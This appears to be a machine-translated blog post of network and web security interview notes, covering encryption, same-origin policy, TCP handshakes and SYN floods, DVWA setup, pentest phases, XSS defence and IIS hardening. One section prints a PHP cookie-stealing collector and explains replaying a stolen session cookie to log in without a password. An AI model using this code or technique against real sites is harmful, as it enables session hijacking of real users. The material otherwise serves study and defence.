Network security, web security, penetration testing of the pen through the summary (a)

Symmetric encryption Asymmetric encryption?

Symmetric encryption: Encryption and decryption with the same key, key maintenance complex N (n-1)/2, not suitable for the Internet transmission key, encryption and decryption efficiency is high. Applies to encrypted data.
Asymmetric encryption: Public key cannot push out the private key, each user an asymmetric key pair can, suitable for the internet to transfer the public key, but low encryption efficiency, applied to digital signature and encryption.

What is a homologous policy?

To prevent different domains from interfering with each other in the user's browser, the browser isolates the content received from different sources (domains).
Browsers do not allow any old scripts to access a site's cookie, otherwise the session is easily hijacked.
Only sites that publish cookies can access these cookies, and only JavaScript that is included or loaded through the pages returned by that site can access cookies.

Where does a cookie exist? Can you open it?

C:\Users\ User name \appdata\roaming\microsoft\windows\cookies
Tools--Folder Options--View--Remove the checkmark to hide the protected file and you'll see the cookie folder.

How does XSS steal cookies?

Attacker code:
<?php

$cookie =$_get[' Cookie '];
$time =date (' y-m-d g:i:s ');
$referer =getenv (' http_referer ');
$cookietxt =fopen (' cookie.txt ', ' a ');
Fwrite ($cookietxt, "Time:". $time. "Cookie:". $cookie. "Referer:". $referer. "); Note double quotes, error prone
Fclose ($cookietxt);

?>

Script side:
<script>
document.write (' ');
</script>

After obtaining a cookie, use Firebug to find a cookie, create a new cookie
Add a cookie, submit it with referer, and log in directly without entering your account password!

TCP, UDP differences and TCP three-time handshake, SYN attack?

Also refer to http://www.cnblogs.com/bizhu/archive/2012/05/12/2497493.html

one, TCP, UDP difference (turn)
Advantages of TCP:

Reliable and stable
TCP is reliable reflected in the TCP before passing data, there will be three handshake to establish the connection, and in the data transfer, there is confirmation, window, retransmission, congestion control mechanism, after the data is transmitted, will also be disconnected to save system resources.
Disadvantages of TCP:

Slow, low-efficiency, high-occupancy system resources, vulnerable to attack
TCP before passing data, it is necessary to build a connection, which consumes time, and in the data transfer, the confirmation mechanism, retransmission mechanism, congestion control mechanism will consume a lot of time, and to maintain all the transport connections on each device, in fact, each connection will occupy the system CPU, memory and other hardware resources.
Moreover, because TCP has the confirmation mechanism, three times handshake mechanism, these also causes the TCP to be exploited easily, realizes the DOS, the DDOS, the CC and so on attacks.
Advantages of UDP:
Faster, slightly safer than TCP
UDP is not a TCP handshake, confirmation, window, retransmission, congestion control mechanism, UDP is a stateless transport protocol, so it is very fast when passing data. Without these mechanisms of TCP, UDP is less vulnerable than TCP is exploited by attackers. But UDP is also unable to avoid attacks, such as: UDP flood attack ...
Disadvantages of UDP:

unreliable, unstable
Because UDP does not have the reliable mechanism of TCP, when the data is passed, if the network quality is not good, it will be easy to drop packets.
Based on the pros and cons above, then:

When should you use TCP:
When the quality of the network communication requirements, such as: the entire data to be accurate to the other side, which is often used for some reliable applications, such as HTTP, HTTPS, FTP, such as the transfer of files protocol, POP, SMTP and other mail transmission protocol.
In daily life, the common use of the TCP protocol is as follows:

Browser, using the HTTP
FlashFXP, using the FTP
Outlook, using the pop, SMTP
Putty, using the Telnet, SSH
QQ File Transfer
............
When should you use UDP:
When the network communication quality requirements are not high, the need for network communication speed as fast as possible, then you can use UDP.
For example, in daily life, the common use of UDP protocol is as follows:

QQ Voice
QQ Video
Tftp


Second, TCP handshake protocol
In the TCP/IP protocol, the TCP protocol provides a reliable connection service with a three-time handshake to establish a connection.
First handshake: When a connection is established, the client sends a SYN packet (SYN=J) to the server and enters the Syn_send state, waiting for the server to confirm;
Second handshake: The server receives the SYN packet, must confirm the customer's SYN (ACK=J+1), and also sends itself a SYN packet (syn=k),
That is, the Syn+ack packet, when the server enters the SYN_RECV state;
Third handshake: The client receives the server's Syn+ack packet, sends the acknowledgment packet ack (ACK=K+1) to the server, and the packet is sent.
The client and server enter the established state to complete three handshake.

After three handshakes, the client and server begin transmitting data, and in the above process there are some important concepts:
Not connected queue: In the three-time handshake protocol, the server maintains an disconnected queue, which is listed as a SYN packet (SYN=J) for each client to open an entry.
This entry indicates that the server has received a SYN packet and has issued a confirmation to the customer that it is waiting for the customer's confirmation package. The connections identified by these entries are in the SYN_RECV state of the server.
When the server receives the customer's confirmation package, the entry is deleted and the server enters the established state. Backlog parameter: Represents the maximum number of seats that are not connected to a queue.
Syn-ack the server sends out the Syn-ack package, if the client does not receive the confirmation package, the server for the first retransmission, waiting for a period of time still did not receive the customer confirmation package,
For a second retransmission, the system removes the connection information from the semi-connection queue if the number of retransmissions exceeds the maximum number of retransmissions specified by the system. Note that the time to wait for each retransmission is not necessarily the same.
Half-Connection survival time: Refers to the maximum time that the entry of a semi-connected queue survives, that is, the maximum time a service receives a SYN packet to confirm that the message is invalid.
The time value is the sum of the maximum wait times for all retransmission request packets. Sometimes we also call the half-connection survival time timeout time, syn_recv survival time.


Three, SYN attack principle
A SYN attack is a DOS attack that leverages TCP protocol flaws to consume CPU and memory resources by sending a large number of half-connection requests.
In addition to affecting the host, SYN attacks can also harm routers, firewalls and other network systems, in fact, SYN attack and no matter what the target system,
These systems can be implemented as long as the TCP service is turned on. As you can see, the server receives a connection request (SYN=J),
Add this information to the disconnected queue and send the request package to the customer (syn=k,ack=j+1), at which point the SYN_RECV state is entered.
When the server does not receive a confirmation package from the client, the request packet is re-sent until the timeout is removed before the entry is never connected to the queue.
With IP spoofing, SYN attacks can achieve very good results, usually, the client in a short period of time to forge a large number of non-existent IP addresses,
Send the SYN packet to the server continuously, the server replies to the confirmation packet, and waits for the customer to confirm, because the source address does not exist,
The server needs to be continuously re-sent until timeout, these forged SYN packets will take a long time to occupy the disconnected queue, the normal SYN request is discarded,
The target system is slow to operate, causing network congestion and even system paralysis in severe cases.

Which certificate should be tested?

Information Security International First certification--CISSP
Information Security Domestic Certification--cisaw
Information Security Domestic Certification--cisp
Information security technology real-operating certification upstart--security+
The necessary proof of it auditors--cisa

How is the DVWA built?

Startup XAMPP (XAMPP (Apache+mysql+php+perl) is a powerful building-station integration package. ) under the Apache middleware and MySQL
Place the DVWA under the Htdocs directory under XAMPP
In the browser input HTTP://127.0.0.1/DVWA can use!
and owasp's vulnerability practice platform: https://sourceforge.net/projects/owaspbwa/files/

What is the flow of penetration testing?

Overview of the Penetration testing process
Pre-interaction stage, intelligence gathering stage, threat modeling phase, vulnerability analysis stage,
Penetration attack phase (exploitation), post-infiltration attack phase (how to control, maintain access), reporting phase.

Before attack: Network casing, network scan, network checkpoint
In attack: Exploit information for penetration attack, get permission
Post-attack: Post-Infiltration maintenance attack, file copy, Trojan implant, trace erase

How XSS defends

1. Filter and encode the front-end input:
For example, only allow the input of the specified type of characters, such as phone number format, registration user name restrictions, etc., the input check needs to be completed on the server side, the front end of the limit is easy to bypass;
Filtering and escaping of special characters;
2. Filter and encode the output: encode and escape the value of the variable when it is exported to the front-end HTML;
3. Use Http-only for key cookies

What protection should the IIS server do:

Collation Source: http://www.williamlong.info/archives/118.html
1. Keep Windows upgraded:
2. Using the IIS Guard tool
3. Remove the Default Web site
4. If you do not need FTP and SMTP services, uninstall them
5. Check your administrator groups and services regularly:
6. Strict control of the server's write access rights
7. Set up a complex password
8. Reduce/exclude sharing on the Web server
9. Disable NetBIOS in the TCP/IP protocol:
10. Blocking with TCP ports
11. Double-Check the *.bat and *.exe files: Search once a week *.bat
12. Managing IIS Directory Security:
13. Use NTFS security:
14. Manage User Accounts
15. Audit your Web server:

Several connection ways and principles of virtual machine

Collation Source: http://blog.csdn.net/shuxiao9058/article/details/7051463

After the virtual machine is installed, two virtual network cards, VMnet1 and VMnet8, are installed by default, others are not installed (you can, of course, install the others manually). Where VMnet1 is the host network card,
Used to connect to the network in host mode. The VMNET8 is a NAT network card that is used for NAT connection. Their IP addresses are randomly generated, and if you're experimenting with virtual machines,
It is best to get rid of the IP address of VMnet1 to VMnet8. It is customary to "fix" the network segment used by the VMware Virtual network card, using the following principles: VMnet1 corresponding network segment is 192.168.10.0,
VMnet2 corresponding to the network segment is 192.168.20.0, the other similar. Of course, usually just use the use of no change, you can surf the internet on the line.

The main ways of VMware network connectivity are: bridging (bridged), NAT, Host Network (HOST-ONLY).

1. Use bridged networking (using bridged network)

Description: Using the VMnet0 Virtual Switch, the virtual machine is quite the same as a stand-alone computer on the network and hosts a separate IP address.
Its network topology 1, the use of bridging, a,a1,a2,b can exchange visits.

Figure 1
2. Use network address translation (NAT)

Description: When using the Vmnet8 Virtual Switch, the virtual machine can be accessed through other workstations on the host one-way network, and other workstations cannot access the virtual machine.
As shown in network Topology 2, with NAT, A1,A2 can access B, but B can not access A1,A2. But A,A1,A2 can exchange visits.

Figure 2
3. Use Host-only Networking (using Host network)

Description: Using the VMNET1 Virtual Switch, the virtual machine can only exchange visits with virtual machines and hosts. That is, not on the Internet, as shown in network topology 3,
With host mode, A,A1,A2 can exchange visits, but A1,A2 cannot access B, nor can it be accessed by B.

Figure 3

XSS There is a cookie must be able to login without a username password?

Basic can. Because the value of the cookie to the browser, the browser to access the page will be used to access the cookie, if the cookie is valid, it will go directly.

If there are errors, please criticize me!

Network security, web security, penetration testing of the pen through the summary (a)